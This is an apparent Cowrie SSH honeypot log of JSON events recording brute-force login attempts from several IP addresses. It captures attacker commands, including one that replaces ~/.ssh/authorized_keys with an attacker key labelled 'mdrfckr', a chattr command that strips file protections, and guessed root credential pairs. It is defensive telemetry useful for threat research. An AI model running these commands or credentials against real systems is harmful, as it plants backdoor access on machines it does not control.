{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:56:39.185957Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:56:39.372003Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:39.372924Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":58336,"dst_ip":"1.2.3.4","dst_port":22,"session":"f24afe3dd463","protocol":"ssh","message":"New connection: 157.20.207.165:58336 (1.2.3.4:22) [session: f24afe3dd463]","sensor":"my-vps","timestamp":"2025-09-09T06:56:39.554647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:56:39.555765Z","src_ip":"157.20.207.165","session":"f24afe3dd463"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:56:39.740271Z","src_ip":"157.20.207.165","session":"f24afe3dd463"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:56:40.518289Z","src_ip":"157.20.207.165","session":"f24afe3dd463"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:41.705813Z","src_ip":"157.20.207.165","session":"f24afe3dd463"}
{"eventid":"cowrie.session.connect","src_ip":"157.20.207.165","src_port":58342,"dst_ip":"1.2.3.4","dst_port":22,"session":"c091057a972d","protocol":"ssh","message":"New connection: 157.20.207.165:58342 (1.2.3.4:22) [session: c091057a972d]","sensor":"my-vps","timestamp":"2025-09-09T06:56:41.887600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:56:41.888472Z","src_ip":"157.20.207.165","session":"c091057a972d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:56:42.072255Z","src_ip":"157.20.207.165","session":"c091057a972d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:56:42.855054Z","src_ip":"157.20.207.165","session":"c091057a972d"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:43.039443Z","src_ip":"157.20.207.165","session":"f9d1991808c0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:56:43.040433Z","src_ip":"157.20.207.165","session":"c091057a972d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55976,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf3e7078d868","protocol":"ssh","message":"New connection: 212.227.235.229:55976 (1.2.3.4:22) [session: bf3e7078d868]","sensor":"my-vps","timestamp":"2025-09-09T06:57:12.545388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:57:12.546266Z","src_ip":"212.227.235.229","session":"bf3e7078d868"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:57:12.789056Z","src_ip":"212.227.235.229","session":"bf3e7078d868"}
{"eventid":"cowrie.login.failed","username":"apache","password":"0","message":"login attempt [apache/0] failed","sensor":"my-vps","timestamp":"2025-09-09T06:57:13.801342Z","src_ip":"212.227.235.229","session":"bf3e7078d868"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:57:15.046639Z","src_ip":"212.227.235.229","session":"bf3e7078d868"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":54202,"dst_ip":"1.2.3.4","dst_port":22,"session":"213504293b86","protocol":"ssh","message":"New connection: 118.26.39.178:54202 (1.2.3.4:22) [session: 213504293b86]","sensor":"my-vps","timestamp":"2025-09-09T06:57:24.784276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:57:24.785151Z","src_ip":"118.26.39.178","session":"213504293b86"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:57:24.986831Z","src_ip":"118.26.39.178","session":"213504293b86"}
{"eventid":"cowrie.login.failed","username":"node","password":"node123","message":"login attempt [node/node123] failed","sensor":"my-vps","timestamp":"2025-09-09T06:57:25.823692Z","src_ip":"118.26.39.178","session":"213504293b86"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:57:27.024284Z","src_ip":"118.26.39.178","session":"213504293b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40603,"dst_ip":"1.2.3.4","dst_port":22,"session":"08e874536b00","protocol":"ssh","message":"New connection: 212.227.235.229:40603 (1.2.3.4:22) [session: 08e874536b00]","sensor":"my-vps","timestamp":"2025-09-09T06:58:25.872829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:58:25.873679Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:58:26.117204Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.login.success","username":"root","password":"tes123","message":"login attempt [root/tes123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:58:27.131727Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:58:27.671036Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:58:27.671721Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T06:58:27.672825Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:27.917051Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T06:58:28.423805Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T06:58:28.424535Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T06:58:28.669315Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:28.670124Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41144,"dst_ip":"1.2.3.4","dst_port":22,"session":"6998bd767010","protocol":"ssh","message":"New connection: 212.227.235.229:41144 (1.2.3.4:22) [session: 6998bd767010]","sensor":"my-vps","timestamp":"2025-09-09T06:58:28.910850Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:58:28.912272Z","src_ip":"212.227.235.229","session":"6998bd767010"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:58:29.154509Z","src_ip":"212.227.235.229","session":"6998bd767010"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T06:58:30.123065Z","src_ip":"212.227.235.229","session":"6998bd767010"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:31.369465Z","src_ip":"212.227.235.229","session":"6998bd767010"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41701,"dst_ip":"1.2.3.4","dst_port":22,"session":"91d6e4711bfc","protocol":"ssh","message":"New connection: 212.227.235.229:41701 (1.2.3.4:22) [session: 91d6e4711bfc]","sensor":"my-vps","timestamp":"2025-09-09T06:58:31.613790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:58:31.614646Z","src_ip":"212.227.235.229","session":"91d6e4711bfc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T06:58:31.859431Z","src_ip":"212.227.235.229","session":"91d6e4711bfc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T06:58:32.890263Z","src_ip":"212.227.235.229","session":"91d6e4711bfc"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:33.135325Z","src_ip":"212.227.235.229","session":"08e874536b00"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T06:58:33.136495Z","src_ip":"212.227.235.229","session":"91d6e4711bfc"}
{"eventid":"cowrie.session.connect","src_ip":"118.26.39.178","src_port":39286,"dst_ip":"1.2.3.4","dst_port":22,"session":"24344645b4d9","protocol":"ssh","message":"New connection: 118.26.39.178:39286 (1.2.3.4:22) [session: 24344645b4d9]","sensor":"my-vps","timestamp":"2025-09-09T06:58:43.222691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T06:58:43.223896Z","src_ip":"118.26.39.178","session":"24344645b4d9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 